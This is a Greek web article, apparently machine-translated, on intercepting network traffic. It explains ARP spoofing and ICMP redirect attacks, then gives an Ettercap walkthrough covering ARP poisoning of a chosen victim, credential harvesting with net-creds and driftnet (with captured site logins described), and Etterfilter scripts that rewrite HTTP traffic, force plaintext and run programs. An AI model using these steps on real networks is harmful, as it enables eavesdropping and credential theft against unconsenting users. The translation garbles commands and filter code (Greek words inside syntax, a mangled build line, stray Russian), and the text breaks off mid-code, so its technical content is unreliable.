Σπίτι › Εγκατάσταση και διαμόρφωση › Οι χάκερ το χρησιμοποιούν για να ανακατευθύνουν την κυκλοφορία. Μέθοδοι επιθέσεων χάκερ. Παραπλάνηση δεδομένων με το Burp

Οι χάκερ το χρησιμοποιούν για να ανακατευθύνουν την κυκλοφορία. Μέθοδοι επιθέσεων χάκερ. Παραπλάνηση δεδομένων με το Burp

Μέθοδοι υποκλοπής κίνησης δικτύου

Η ακρόαση του δικτύου με τη χρήση προγραμμάτων αναλυτών δικτύου είναι η πρώτη, η μεγαλύτερη με απλό τρόπουποκλοπή δεδομένων.

Για προστασία από την υποκλοπή δικτύου, χρησιμοποιήστε ειδικά προγράμματα, για παράδειγμα, το AntiSniff, το οποίο είναι ικανό να αναγνωρίζει υπολογιστές στο δίκτυο που ακούν την κίνηση του δικτύου.

Για να λύσουν τα προβλήματά τους, τα προγράμματα antisniffer χρησιμοποιούν ένα ειδικό σημάδι της παρουσίας συσκευών ακρόασης στο δίκτυο - η κάρτα δικτύου του υπολογιστή sniffer πρέπει να βρίσκεται σε ειδική λειτουργία ακρόασης. Κατά τη λειτουργία ακρόασης, οι υπολογιστές δικτύου αντιδρούν με ειδικό τρόπο στα γραφήματα δεδομένων IP που αποστέλλονται στον υπό δοκιμή κεντρικό υπολογιστή. Για παράδειγμα, οι κεντρικοί υπολογιστές ακρόασης επεξεργάζονται συνήθως όλη την εισερχόμενη κίνηση, όχι μόνο τα γραφήματα δεδομένων που αποστέλλονται στη διεύθυνση του κεντρικού υπολογιστή. Υπάρχουν άλλα σημάδια που υποδεικνύουν ύποπτη συμπεριφορά κεντρικού υπολογιστή που μπορεί να αναγνωρίσει το AntiSniff.

Αναμφίβολα, η υποκλοπή είναι πολύ χρήσιμη από την άποψη ενός εισβολέα, καθώς επιτρέπει σε κάποιον να λάβει πολλές χρήσιμες πληροφορίες - κωδικούς πρόσβασης που μεταδίδονται μέσω του δικτύου, διευθύνσεις υπολογιστών δικτύου, εμπιστευτικά δεδομένα, γράμματα κ.λπ. Ωστόσο, η απλή υποκλοπή δεν επιτρέπει σε έναν χάκερ να παρεμβαίνει στην επικοινωνία δικτύου μεταξύ δύο κεντρικών υπολογιστών προκειμένου να τροποποιήσει και να καταστρέψει δεδομένα. Για να λυθεί ένα τέτοιο πρόβλημα, απαιτείται πιο σύνθετη τεχνολογία.

Ρύζι. 1 Ψευδή αιτήματα ARP

Ας δούμε πώς ένας χάκερ μπορεί να χρησιμοποιήσει το ARP για να υποκλέψει τις επικοινωνίες δικτύου μεταξύ των κεντρικών υπολογιστών Α και Β.

Για να υποκλέψει την κυκλοφορία δικτύου μεταξύ των κεντρικών υπολογιστών Α και Β, ο χάκερ επιβάλλει τη διεύθυνση IP του σε αυτούς τους κεντρικούς υπολογιστές, έτσι ώστε οι Α και Β να χρησιμοποιούν αυτήν την παραποιημένη διεύθυνση IP κατά την ανταλλαγή μηνυμάτων. Για να επιβάλει τη διεύθυνση IP του, ο χάκερ εκτελεί τις ακόλουθες λειτουργίες.

Ο εισβολέας καθορίζει τις διευθύνσεις MAC των κεντρικών υπολογιστών Α και Β, για παράδειγμα, χρησιμοποιώντας την εντολή nbtstat από το πακέτο W2RK.
Ο εισβολέας στέλνει μηνύματα στις αναγνωρισμένες διευθύνσεις MAC των κεντρικών υπολογιστών Α και Β, οι οποίες είναι παραποιημένες απαντήσεις ARP σε αιτήματα για την επίλυση των διευθύνσεων IP των κεντρικών υπολογιστών στις διευθύνσεις MAC των υπολογιστών. Ο κεντρικός υπολογιστής Α ενημερώνεται ότι η διεύθυνση IP του κεντρικού υπολογιστή Β αντιστοιχεί στη διεύθυνση MAC του υπολογιστή του εισβολέα. Ο κεντρικός υπολογιστής Β ενημερώνεται ότι η διεύθυνση IP του κεντρικού υπολογιστή Α αντιστοιχεί επίσης στη διεύθυνση MAC του υπολογιστή του εισβολέα.
Οι κεντρικοί υπολογιστές Α και Β αποθηκεύουν τις ληφθείσες διευθύνσεις MAC στις κρυφές μνήμες ARP και στη συνέχεια τις χρησιμοποιούν για να στείλουν μηνύματα ο ένας στον άλλο. Εφόσον οι διευθύνσεις IP Α και Β αντιστοιχούν στη διεύθυνση MAC του υπολογιστή του εισβολέα, οι κεντρικοί υπολογιστές Α και Β, χωρίς υποψία, επικοινωνούν μέσω ενός μεσάζοντα που μπορεί να κάνει οτιδήποτε με τα μηνύματά τους.

Σε δίκτυα UNIX, αυτός ο τύπος επίθεσης πλαστών αιτημάτων ARP μπορεί να υλοποιηθεί χρησιμοποιώντας βοηθητικά προγράμματα συστήματος για την παρακολούθηση και τη διαχείριση της κυκλοφορίας του δικτύου, για παράδειγμα, το arpredirect. Δυστυχώς, τέτοια αξιόπιστα βοηθητικά προγράμματα δεν φαίνεται να εφαρμόζονται σε δίκτυα Windows. Για παράδειγμα, στον ιστότοπο του NTsecurity μπορείτε να κάνετε λήψη του βοηθητικού προγράμματος GrabitAII, το οποίο παρουσιάζεται ως εργαλείο ανακατεύθυνσης της κυκλοφορίας μεταξύ κεντρικών υπολογιστών δικτύου. Ωστόσο, ένας βασικός έλεγχος της λειτουργικότητας του βοηθητικού προγράμματος GrabitAII δείχνει ότι η πλήρης επιτυχία στην υλοποίηση των λειτουργιών του είναι ακόμα μακριά.

Για να υποκλέψει την κυκλοφορία δικτύου, ένας εισβολέας μπορεί να πλαστογραφήσει την πραγματική διεύθυνση IP ενός δρομολογητή δικτύου με τη δική του διεύθυνση IP, κάνοντας αυτό, για παράδειγμα, χρησιμοποιώντας παραποιημένα μηνύματα ICMP Redirect. Ο κεντρικός υπολογιστής Α πρέπει, σύμφωνα με το RFC-1122, να αντιλαμβάνεται το ληφθέν μήνυμα Ανακατεύθυνσης ως απόκριση σε ένα datagram που αποστέλλεται σε άλλο κεντρικό υπολογιστή, για παράδειγμα, ο κεντρικός υπολογιστής Α καθορίζει τις ενέργειές του στο μήνυμα ανακατεύθυνσης με βάση τα περιεχόμενα του ληφθέντος μηνύματος ανακατεύθυνσης. και αν η ανακατεύθυνση του datagram καθορίζεται στην Ανακατεύθυνση από το Α στο Β κατά μήκος μιας νέας διαδρομής, αυτό ακριβώς θα κάνει ο κεντρικός υπολογιστής Α.

Ρύζι. 2 Εσφαλμένη δρομολόγηση

Για να εκτελέσει ψευδή δρομολόγηση, ο εισβολέας πρέπει να γνωρίζει ορισμένες λεπτομέρειες σχετικά με τον οργανισμό τοπικό δίκτυο, στον οποίο βρίσκεται ο κεντρικός υπολογιστής Α, συγκεκριμένα η διεύθυνση IP του δρομολογητή μέσω του οποίου η κίνηση αποστέλλεται από τον κεντρικό υπολογιστή Α στο Β. Γνωρίζοντας αυτό, ο εισβολέας θα δημιουργήσει ένα datagram IP στο οποίο η διεύθυνση IP του αποστολέα ορίζεται ως η IP του δρομολογητή διεύθυνση και ο παραλήπτης καθορίζεται host A. Στο datagram περιλαμβάνεται επίσης ένα μήνυμα ICMP Redirect με το πεδίο διεύθυνσης του νέου δρομολογητή να έχει οριστεί στη διεύθυνση IP του υπολογιστή του εισβολέα. Έχοντας λάβει ένα τέτοιο μήνυμα, ο κεντρικός υπολογιστής Α θα στείλει όλα τα μηνύματα στη διεύθυνση IP του υπολογιστή του εισβολέα.

Για να προστατευτείτε από μια τέτοια επίθεση, θα πρέπει να απενεργοποιήσετε (για παράδειγμα, χρησιμοποιώντας ένα τείχος προστασίας) την επεξεργασία των μηνυμάτων ICMP Redirect στον κεντρικό υπολογιστή A και η εντολή tracert (στο Unix αυτή είναι η εντολή tracerout) μπορεί να αποκαλύψει τη διεύθυνση IP του υπολογιστή του εισβολέα . Αυτά τα βοηθητικά προγράμματα μπορούν να βρουν μια πρόσθετη διαδρομή που εμφανίστηκε στο τοπικό δίκτυο που δεν είχε προβλεφθεί κατά την εγκατάσταση, εκτός εάν, φυσικά, ο διαχειριστής του δικτύου είναι σε εγρήγορση.

Τα παραπάνω παραδείγματα υποκλοπών (στις οποίες οι δυνατότητες των εισβολέων δεν είναι καθόλου περιορισμένες) μας πείθουν για την ανάγκη προστασίας των δεδομένων που μεταδίδονται μέσω του δικτύου εάν τα δεδομένα περιέχουν εμπιστευτικές πληροφορίες. Η μόνη μέθοδος προστασίας από υποκλοπές κυκλοφορίας δικτύου είναι η χρήση προγραμμάτων που εφαρμόζουν κρυπτογραφικούς αλγόριθμους και πρωτόκολλα κρυπτογράφησης και αποτρέπουν την αποκάλυψη και την αντικατάσταση μυστικών πληροφοριών. Για την επίλυση τέτοιων προβλημάτων, η κρυπτογραφία παρέχει τα μέσα για την κρυπτογράφηση, την υπογραφή και την επαλήθευση της αυθεντικότητας των μηνυμάτων που μεταδίδονται μέσω ασφαλών πρωτοκόλλων.

Η πρακτική εφαρμογή όλων των μεθόδων κρυπτογράφησης για την προστασία της ανταλλαγής πληροφοριών παρέχεται από Δίκτυα VPN(Εικονικό Ιδιωτικό Δίκτυο - Εικονικά ιδιωτικά δίκτυα).

Υποκλοπή σύνδεσης TCP

Η πιο εξελιγμένη επίθεση υποκλοπής κυκλοφορίας δικτύου θα πρέπει να θεωρείται η σύλληψη σύνδεσης TCP (πειρατεία TCP), όταν ένας χάκερ διακόπτει την τρέχουσα συνεδρία επικοινωνίας με τον κεντρικό υπολογιστή δημιουργώντας και στέλνοντας πακέτα TCP στον κεντρικό υπολογιστή που δέχεται επίθεση. Στη συνέχεια, χρησιμοποιώντας τη δυνατότητα του πρωτοκόλλου TCP να επαναφέρει μια διακοπείσα σύνδεση TCP, ο χάκερ παρεμποδίζει τη συνομιλία επικοινωνίας που έχει διακοπεί και τη συνεχίζει αντί για τον αποσυνδεδεμένο πελάτη.

Το πρωτόκολλο TCP (Transmission Control Protocol) είναι ένα από τα βασικά πρωτόκολλα μεταφοράς. Επίπεδο OSI, επιτρέποντάς σας να δημιουργήσετε λογικές συνδέσεις μέσω ενός εικονικού καναλιού επικοινωνίας. Σε αυτό το κανάλι, τα πακέτα μεταδίδονται και λαμβάνονται με την αλληλουχία τους καταγεγραμμένη, η ροή των πακέτων ελέγχεται, οργανώνεται η αναμετάδοση παραμορφωμένων πακέτων και στο τέλος της συνεδρίας το κανάλι επικοινωνίας διακόπτεται. Το TCP είναι το μόνο πρωτόκολλο βασικό πρωτόκολλοαπό την οικογένεια TCP/IP, η οποία διαθέτει προηγμένο σύστημα αναγνώρισης και σύνδεσης μηνυμάτων.

Επισκόπηση των sniffer πακέτων λογισμικού

Όλα τα sniffer λογισμικού μπορούν να χωριστούν σε δύο κατηγορίες: sniffer που υποστηρίζουν εκκίνηση από γραμμή εντολών, και sniffers με γραφική διεπαφή. Ωστόσο, σημειώνουμε ότι υπάρχουν sniffer που συνδυάζουν και τις δύο αυτές δυνατότητες. Επιπλέον, τα sniffer διαφέρουν μεταξύ τους ως προς τα πρωτόκολλα που υποστηρίζουν, το βάθος ανάλυσης των πακέτων που έχουν υποκλαπεί, τη δυνατότητα διαμόρφωσης φίλτρων και τη δυνατότητα συμβατότητας με άλλα προγράμματα.

Συνήθως το παράθυρο οποιουδήποτε sniffer με γραφική διεπαφήαποτελείται από τρεις περιοχές. Το πρώτο από αυτά εμφανίζει τα συνοπτικά δεδομένα των υποκλαπόμενων πακέτων. Συνήθως, αυτή η περιοχή εμφανίζει ένα ελάχιστο πεδία, δηλαδή: χρόνος υποκλοπής πακέτων. Διευθύνσεις IP του αποστολέα και του παραλήπτη του πακέτου. Διευθύνσεις MAC του αποστολέα και του παραλήπτη του πακέτου, τις διευθύνσεις θύρας προέλευσης και προορισμού. τύπος πρωτοκόλλου (επίπεδο δικτύου, μεταφοράς ή εφαρμογής). ορισμένες συνοπτικές πληροφορίες σχετικά με τα υποκλαπέντα δεδομένα. Η δεύτερη περιοχή εμφανίζει στατιστικές πληροφορίες για το μεμονωμένο επιλεγμένο πακέτο και, τέλος, η τρίτη περιοχή εμφανίζει το πακέτο σε δεκαεξαδική μορφή ή χαρακτήρες ASCII.

Σχεδόν όλα τα packet sniffers σάς επιτρέπουν να αναλύετε αποκωδικοποιημένα πακέτα (γι' αυτό και τα packet sniffers ονομάζονται επίσης packet αναλυτές ή αναλυτές πρωτοκόλλου). Ο ανιχνευτής διανέμει τα υποκλαπέντα πακέτα σε επίπεδα και πρωτόκολλα. Ορισμένοι ανιχνευτές πακέτων είναι σε θέση να αναγνωρίζουν το πρωτόκολλο και να εμφανίζουν τις πληροφορίες που έχουν καταγραφεί. Αυτός ο τύπος πληροφοριών εμφανίζεται συνήθως στη δεύτερη περιοχή του παραθύρου sniffer. Για παράδειγμα, κάθε sniffer μπορεί να αναγνωρίσει το πρωτόκολλο TCP και οι προηγμένοι sniffer μπορούν να καθορίσουν ποια εφαρμογή δημιούργησε αυτήν την κίνηση. Οι περισσότεροι αναλυτές πρωτοκόλλων αναγνωρίζουν πάνω από 500 διαφορετικά πρωτόκολλα και μπορούν να τα περιγράψουν και να τα αποκωδικοποιήσουν ονομαστικά. Όσο περισσότερες πληροφορίες μπορεί να αποκωδικοποιήσει και να εμφανίσει ένας sniffer στην οθόνη, τόσο λιγότερες θα πρέπει να αποκωδικοποιηθούν χειροκίνητα.

Ένα πρόβλημα που μπορεί να αντιμετωπίσουν οι ανιχνευτές πακέτων είναι η αδυναμία να αναγνωρίσουν σωστά ένα πρωτόκολλο χρησιμοποιώντας μια θύρα διαφορετική από την προεπιλεγμένη θύρα. Για παράδειγμα, για να βελτιωθεί η ασφάλεια, ορισμένες γνωστές εφαρμογές ενδέχεται να ρυθμιστούν ώστε να χρησιμοποιούν θύρες διαφορετικές από τις προεπιλεγμένες θύρες. Έτσι, αντί για την παραδοσιακή θύρα 80 που είναι δεσμευμένη για τον διακομιστή web, αυτόν τον διακομιστήΜπορείτε να το ρυθμίσετε αναγκαστικά στη θύρα 8088 ή σε οποιαδήποτε άλλη. Ορισμένοι αναλυτές πακέτων σε αυτήν την κατάσταση δεν είναι σε θέση να προσδιορίσουν σωστά το πρωτόκολλο και να εμφανίσουν μόνο πληροφορίες σχετικά με το πρωτόκολλο χαμηλότερου επιπέδου (TCP ή UDP).

Υπάρχουν sniffers λογισμικού που συνοδεύονται από αναλυτικές ενότητες λογισμικού ως πρόσθετα ή ενσωματωμένες μονάδες που σας επιτρέπουν να δημιουργείτε αναφορές με χρήσιμες αναλυτικές πληροφορίες σχετικά με την υποκλοπή κυκλοφορίας.

Ένα άλλο χαρακτηριστικό γνώρισμα των περισσότερων αναλυτών πακέτων λογισμικού είναι η δυνατότητα διαμόρφωσης φίλτρων πριν και μετά την καταγραφή της κυκλοφορίας. Τα φίλτρα επιλέγουν ορισμένα πακέτα από τη γενική κίνηση σύμφωνα με ένα δεδομένο κριτήριο, το οποίο σας επιτρέπει να απαλλαγείτε από περιττές πληροφορίες κατά την ανάλυση της κυκλοφορίας.

Εναλλακτικές για το Ettercap

Το Ettercap είναι το πιο δημοφιλές λογισμικό επίθεσης man-in-the-middle, αλλά είναι το καλύτερο; Σε όλες τις οδηγίες, θα δείτε ότι το Ettercap δεν χρησιμοποιείται σχεδόν ποτέ μόνο του, ότι το ένα ή το άλλο πρόγραμμα χτίζεται πάντα μαζί του σε μια αλυσίδα επεξεργασίας κίνησης. Ίσως αυτό προσθέτει ευελιξία· γενικά, αυτή η προσέγγιση είναι η βάση του UNIX - ένα πρόγραμμα εκτελεί μια εργασία και ο τελικός χρήστης συνδυάζει διάφορα προγράμματα για να επιτύχει το επιθυμητό αποτέλεσμα. Με αυτήν την προσέγγιση, ο κώδικας προγράμματος είναι πιο εύκολο να διατηρηθεί· από τέτοια μικροσκοπικά «τούβλα» μπορείτε να δημιουργήσετε ένα σύστημα οποιασδήποτε πολυπλοκότητας και ευελιξίας. Ωστόσο, το να έχετε πέντε ανοιχτές κονσόλες με διαφορετικές εργασίες, η εργασία των οποίων τα προγράμματα στοχεύουν στην επίτευξη ενός μόνο αποτελέσματος, δεν είναι πολύ βολικό, είναι απλώς πιο περίπλοκο, υπάρχει πιθανότητα να κάνετε λάθος σε κάποιο στάδιο και ολόκληρο το ρυθμισμένο το σύστημα θα λειτουργήσει μάταια.

Net-Creds sniff:

Διευθύνσεις URL επίσκεψης
Τα αιτήματα POST στάλθηκαν
συνδέσεις/κωδικοί πρόσβασης από φόρμες HTTP
συνδέσεις/κωδικοί πρόσβασης για βασικό έλεγχο ταυτότητας HTTP
Αναζητήσεις HTTP
Συνδέσεις/κωδικοί πρόσβασης FTP
Συνδέσεις/κωδικοί πρόσβασης IRC
POP είσοδοι/κωδικοί πρόσβασης
Σύνδεση/κωδικοί πρόσβασης IMAP
Σύνδεση/κωδικοί πρόσβασης Telnet
Σύνδεση/κωδικοί πρόσβασης SMTP
Συμβολοσειρά κοινότητας SNMP
όλα τα υποστηριζόμενα πρωτόκολλα NTLMv1/v2 όπως HTTP, SMB, LDAP κ.λπ.
Kerberos

Μια καλή επιλογή αναχαιτισμένων, και το driftnet είναι απλούστερο από αυτή την άποψη - δείχνει μόνο υποκλαπείς εικόνες.

Θέστε το μηχάνημά σας σε λειτουργία προώθησης.

Echo "1" > /proc/sys/net/ipv4/ip_forward

Εκκινήστε το Ettercap με γραφική διεπαφή (-G):

Ettercap-G

Τώρα επιλέξτε Hosts, υπάρχει ένα υποστοιχείο Scan for hosts. Αφού ολοκληρωθεί η σάρωση, επιλέξτε Λίστα κεντρικών υπολογιστών:

Ως Target1, επιλέξτε το router (Προσθήκη στο Target 1), ως Target2 επιλέξτε τη συσκευή στην οποία θα επιτεθείτε (Add to Target 2).

Αλλά εδώ μπορεί να προκύψει το πρώτο πρόβλημα, ειδικά αν υπάρχουν πολλοί οικοδεσπότες. Σε διάφορες οδηγίες, συμπεριλαμβανομένου του βίντεο που παρουσιάζεται παραπάνω, οι συγγραφείς ανεβαίνουν στο μηχάνημα προορισμού (όλοι, για κάποιο λόγο, έχουν Windows) και χρησιμοποιώντας την εντολή εξετάζουν την IP αυτού του μηχανήματος στο τοπικό δίκτυο. Συμφωνώ, αυτή η επιλογή είναι απαράδεκτη για πραγματικές συνθήκες.

Εάν κάνετε σάρωση χρησιμοποιώντας , μπορείτε να λάβετε μερικά Επιπλέον πληροφορίεςσχετικά με τους κεντρικούς υπολογιστές, πιο συγκεκριμένα, σχετικά με τον κατασκευαστή της κάρτας δικτύου:

Nmap -sn 192.168.1.0/24

Εάν τα δεδομένα εξακολουθούν να μην είναι αρκετά, τότε μπορείτε να κάνετε μια σάρωση για να προσδιορίσετε το λειτουργικό σύστημα:

Nmap -O 192.168.1.0/24

Όπως μπορούμε να δούμε, το μηχάνημα με IP 192.168.1.33 αποδείχθηκε ότι είναι Windows, αν αυτό δεν είναι σημάδι από πάνω, τότε τι είναι; 😉 LOL

Αυτό προσθέτουμε ως δεύτερο στόχο.

Τώρα μεταβείτε στο στοιχείο μενού Mitm. Εκεί, επιλέξτε ARP Poisoning... Επιλέξτε το πλαίσιο για απομακρυσμένες συνδέσεις Sniff.

Αρχίζουμε τη συγκομιδή, σε ένα παράθυρο ξεκινάμε

Net-creds

σε άλλο (και τα δύο προγράμματα μπορούν να εκτελεστούν χωρίς επιλογές)

Παρασυρόμενο δίχτυ

Η συλλογή δεδομένων ξεκίνησε αμέσως:

Στη δεξιά πλευρά, το driftnet άνοιξε ένα άλλο παράθυρο στο οποίο εμφανίζει τις υποκλαπείς εικόνες. Στο παράθυρο net-creds βλέπουμε ιστότοπους που έχουν επισκεφτεί και υποκλαπείς κωδικούς πρόσβασης:

1.2 Σουίτα Ettercap + Burp
3. Προβολή δεδομένων (ιστοσελίδες που επισκέφθηκαν και καταγράψατε κωδικοί πρόσβασης) στο Ettercap

Στο μενού Προβολή έχουμε πρόσβαση στις καρτέλες Συνδέσεις και Προφίλ. Μπορείτε επίσης να επιλέξετε το πλαίσιο Επίλυση διευθύνσεων IP. Οι συνδέσεις είναι, φυσικά, συνδέσεις. Το Ettercap συλλέγει προφίλ στη μνήμη για κάθε κεντρικό υπολογιστή που ανακαλύπτει. Οι χρήστες και οι κωδικοί πρόσβασης συλλέγονται εκεί. Σε αυτήν την περίπτωση, τα προφίλ με καταγεγραμμένα δεδομένα λογαριασμού (κωδικοί πρόσβασης) επισημαίνονται με ένα σταυρό:

Δεν χρειάζεται να βασίζεστε υπερβολικά στα προφίλ - για παράδειγμα, επισημαίνονται υποκλοπές σύνδεσης και κωδικοί πρόσβασης για FTP και άλλες υπηρεσίες, για τις οποίες το πρόγραμμα μπορεί να ερμηνεύσει με σαφήνεια τις πληροφορίες που λαμβάνονται ως διαπιστευτήρια. Αυτό δεν περιλαμβάνει, για παράδειγμα, βασικά δεδομένα ελέγχου ταυτότητας, στοιχεία σύνδεσης και κωδικούς πρόσβασης που έχουν εισαχθεί σε φόρμες ιστού.

Στις Συνδέσεις, τα πιο πολλά υποσχόμενα δεδομένα επισημαίνονται με έναν αστερίσκο:

Μπορείτε να κάνετε διπλό κλικ σε αυτές τις καταχωρήσεις για να δείτε λεπτομέρειες:

Για να μην κάνετε αναζήτηση για αυτά τα αστέρια σε όλη τη λίστα, μπορείτε να τα ταξινομήσετε με βάση αυτό το πεδίο και θα εμφανιστούν όλα στην κορυφή ή στο κάτω μέρος:

Βασικός έλεγχος ταυτότητας:

Σύνδεση-κωδικός πρόσβασης για Yandex (επισημαίνεται παρακάτω):

Αυτά είναι τα υποκλαπέντα διαπιστευτήρια για το VKontakte:

Επίσης, τα πιο ενδιαφέροντα δεδομένα συλλέγονται στην κάτω κονσόλα:

Εάν θέλετε να αποθηκεύσετε τα αποτελέσματα του προγράμματος, χρησιμοποιήστε αυτές τις επιλογές (καθορίστε τα πλήκτρα κατά την εκκίνηση του Ettercap:

Επιλογές καταγραφής: -w, --write εγγραφή καταγεγραμμένων δεδομένων στο pcapfile -L, --log εγγραφή όλης της κυκλοφορίας σε αυτό -l, --log-info εγγραφή μόνο παθητικής πληροφορίας σε αυτό -m, --log-msg εγγραφή όλων των μηνυμάτων σε αυτό το -c, --compress χρησιμοποιήστε συμπίεση gzip για αρχεία καταγραφής

4. Αντικατάσταση δεδομένων on-the-fly στο Ettercap
4.1 Χρήση προσαρμοσμένων φίλτρων Ettercap

Σημείωση: Παρά όλες τις δοκιμές, τα φίλτρα Ettercap εξακολουθούσαν να μην λειτουργούν για μένα. Είναι δύσκολο να καταλάβουμε αν πρόκειται για χέρια, δυνατότητες υλικού ή σφάλμα στο ίδιο το πρόγραμμα... Αλλά για την έκδοση 0.8.2 (η πιο πρόσφατη αυτή τη στιγμή), υπάρχει μια αναφορά σφαλμάτων σχετικά με προβλήματα με τα φίλτρα. Γενικά, αν κρίνουμε από τις αναφορές σφαλμάτων και τα φόρουμ, τα φίλτρα είτε πέφτουν συχνά είτε δεν έχουν λειτουργήσει καθόλου για μεγάλο χρονικό διάστημα. Υπάρχει ένα υποκατάστημα όπου έγιναν αλλαγές πριν από 5 μήνες https://github.com/Ettercap/ettercap/tree/filter-improvements, δηλ. φίλτρα-βελτιώσεις (με βελτιώσεις φίλτρων). Τόσο για αυτόν τον κλάδο όσο και για την έκδοση από το αποθετήριο, έγιναν μια μεγάλη ποικιλία δοκιμών, δοκιμάστηκαν διάφορα φίλτρα υπό διαφορετικές συνθήκες, δαπανήθηκε πολύς χρόνος, αλλά δεν υπήρξε αποτέλεσμα. Παρεμπιπτόντως, για να εγκαταστήσετε την έκδοση βελτιώσεων φίλτρων στο Kali Linux, πρέπει να κάνετε τα εξής:

Sudo apt-get αφαίρεση ettercap-γραφικό ettercap-κοινό sudo apt-get εγκατάσταση git debhelper bison check cmake flex ghostscript libbsd-dev libcurl4-openssl-dev libgtk2.0-dev libltdl-dev libluajit-5.1-dev libncurses5 libpcap-dev libpcre3-dev libssl-dev libgtk-3-dev ghostscript groff libtool libpcre3 libncurses5-dev git κλώνος -b φίλτρο-βελτιώσεις https://github.com/Ettercap/ettercap.git cd ettercap/ mkdirLECSF Buildd =On ../ make sudo make install

Γενικά, αν τα φίλτρα σας δεν λειτουργούν, τότε δεν είστε μόνοι. Στις οδηγίες για το Ettercap, δεν μπορώ να παραλείψω το θέμα των φίλτρων, οπότε θα συζητηθούν σε κάθε περίπτωση.

Μέχρι στιγμής χρησιμοποιούσαμε το Ettercap για πλαστογράφηση ARP. Αυτή είναι μια πολύ επιφανειακή εφαρμογή. Χάρη στα προσαρμοσμένα φίλτρα, μπορούμε να επέμβουμε και να αλλάξουμε την κυκλοφορία εν κινήσει. Τα φίλτρα πρέπει να περιέχονται σε ξεχωριστά αρχεία και πρέπει να μεταγλωττίζονται χρησιμοποιώντας το πρόγραμμα Etterfilter πριν από τη χρήση. Αν και η τεκμηρίωση στην οποία δίνεται ο σύνδεσμος φαίνεται ελάχιστη, αλλά σε συνδυασμό με τα παραδείγματα που δίνονται παρακάτω, θα σας επιτρέψει να γράψετε αρκετά ενδιαφέροντα φίλτρα.

Ας δημιουργήσουμε το πρώτο μας φίλτρο, θα αντικαταστήσει όλες τις εικόνες με αυτό:

Σε ένα αρχείο με το όνομα img_replacer.filter, αντιγράψτε:

If (ip.proto == TCP && tcp.dst == 80) ( if (αναζήτηση(DATA.data, "Accept-Encoding")) ( αντικατάσταση ("Accept-Encoding", "Accept-Rubbish!"); # Σημείωση: η συμβολοσειρά αντικατάστασης έχει το ίδιο μήκος με το αρχικό msg("Zappped Accept-Encoding!\n"); ) ) if (ip.proto == TCP && tcp.src == 80) ( αντικατάσταση("src=" , " src=\"http://www.irongeek.com/images/jollypwn.png\" "); αντικατάσταση("SRC=", "src=\"http://www.irongeek.com/images/ jollypwn. png\" "); αντικατάσταση("src =", "src=\"http://www.irongeek.com/images/jollypwn.png\" "); replace("SRC =", "src= \" http://www.irongeek.com/images/jollypwn.png\" "); msg("Εκτέλεση φίλτρου.\n"); )

Μεταγλωττίστε το αρχείο:

Etterfilter img_replacer.filter -o img_replacer.ef

Αποτελέσματα συλλογής:

Etterfilter 0.8.2 πνευματικά δικαιώματα 2001-2015 Ettercap Development Team Φορτώθηκαν 14 πίνακες πρωτοκόλλου: ΑΠΟΚΩΔΙΚΟΠΟΙΗΜΕΝΑ ΔΕΔΟΜΕΝΑ udp tcp esp gre icmp ipv6 ip arp wifi fddi tr eth Φορτώθηκαν 13 σταθερές: VRRP OSPF GRE UDPPMP6 Πηγή ΑΠΟΚΩΔΙΚΟΠΟΙΗΜΕΝΩΝ IPPOTPIC αρχείο Ολοκληρώθηκε το "img_replacer.filter". Το ξεδίπλωμα του μετα-δέντρου έγινε. Έγινε η μετατροπή των ετικετών σε πραγματικές μετατοπίσεις. Η εγγραφή εξόδου στο "img_replacer.ef" ολοκληρώθηκε. -> Σενάριο κωδικοποιημένο σε 18 οδηγίες.

Ο διακόπτης -F λέει στο πρόγραμμα να φορτώσει το φίλτρο από το αρχείο που ακολουθεί τον διακόπτη. Μετά τη μεταγλώττιση, το όνομα του νέου μας αρχείου με το φίλτρο είναι img_replacer.ef, οπότε η εντολή παίρνει τη μορφή:

Ettercap -G -F img_replacer.ef

Σημείωση: Όταν παρακολουθείτε την κυκλοφορία ιστού, τα πακέτα που βλέπετε μπορεί να είναι σε κρυπτογραφημένη μορφή. Για αποτελεσματική εργασίαφίλτρα, το Ettercap χρειάζεται κίνηση στη φόρμα απλό κείμενο. Σύμφωνα με ορισμένες παρατηρήσεις, ο τύπος κωδικοποίησης που χρησιμοποιούν οι ιστοσελίδες είναι "Accept-Encoding: gzip, deflate"

Παρακάτω είναι ένα φίλτρο που αντικαθιστά την κωδικοποίηση, επιβάλλοντας την επικοινωνία με τη μορφή απλού κειμένου:

If (ip.proto == TCP && tcp.dst == 80) ( if (search(DATA.data, "gzip")) (place("gzip", " "); # note: τέσσερα κενά στην αντικατασταθείσα συμβολοσειρά msg ("whited out gzip\n"); ) ) if (ip.proto == TCP && tcp.dst == 80) ( if (search(DATA.data, "deflate")) ( αντικατάσταση("deflate", " "); # σημείωση: επτά κενά στην αντικατασταθείσα γραμμή msg("whited out deflate\n"); ) )

Η σύνταξη για τη σύνταξη φίλτρων περιγράφεται λεπτομερώς και, στη συνέχεια, υπάρχουν μερικά ακόμη παραδείγματα:

# αντικατάσταση κειμένου σε ένα πακέτο: if (ip.proto == TCP && search(DATA.data, "lol"))(place("lol", "smh"); msg("filter ran"); ) # show μήνυμα , εάν η θύρα tcp είναι 22 εάν (ip.proto == TCP) ( if (tcp.src == 22 || tcp.dst == 22) ( msg("SSH packet\n"); ) ) # καταγράψτε ολόκληρη η κίνηση telnet, εκτελέστε επίσης ./πρόγραμμα για κάθε πακέτο εάν (ip.proto == TCP) ( if (tcp.src == 23 || tcp.dst == 23) ( log(DATA.data, "./ logfile.log "); exec("./program"); ) ) # καταγραφή όλης της κυκλοφορίας εκτός από το http if (ip.proto == TCP && tcp.src != 80 && tcp.dst != 80) ( log (DATA.data , "./logfile.log"); ) # ορισμένες λειτουργίες στο ωφέλιμο φορτίο πακέτου εάν (DATA.data + 20 == 0x4142) ( DATA.data + 20 = 0x4243; ) αλλιώς ( DATA.data = " τροποποιήθηκε"; DATA .data + 20 = 0x4445; ) # απορρίψτε όλα τα πακέτα που περιέχουν "ettercap" if (αναζήτηση(DECODED.data, "ettercap")) ( msg("κάποιος μιλάει για εμάς...\n") ; drop( ); kill(); ) # εγγραφή αποκρυπτογραφημένων πακέτων ssh που ταιριάζουν με την κανονική έκφραση if (ip.proto == TCP) ( if (tcp.src == 22 || tcp.dst == 22) ( if (regex(DECODED.data, ".*login.*")) ( log(DECODED.data, "./decrypted_log"); ) ) ) # killing packets if (ip.ttl< 5) { msg("The packet will die soon\n"); } # то же самое для IPv6, но делая тривиальный тест убеждаемся, что перед нами действительно IPv6 пакеты if (eth.proto == IP6 && ipv6.hl < 5) { msg("The IPv6 packet will die soon\n"); } # сравнение строки на данный сдвиг if 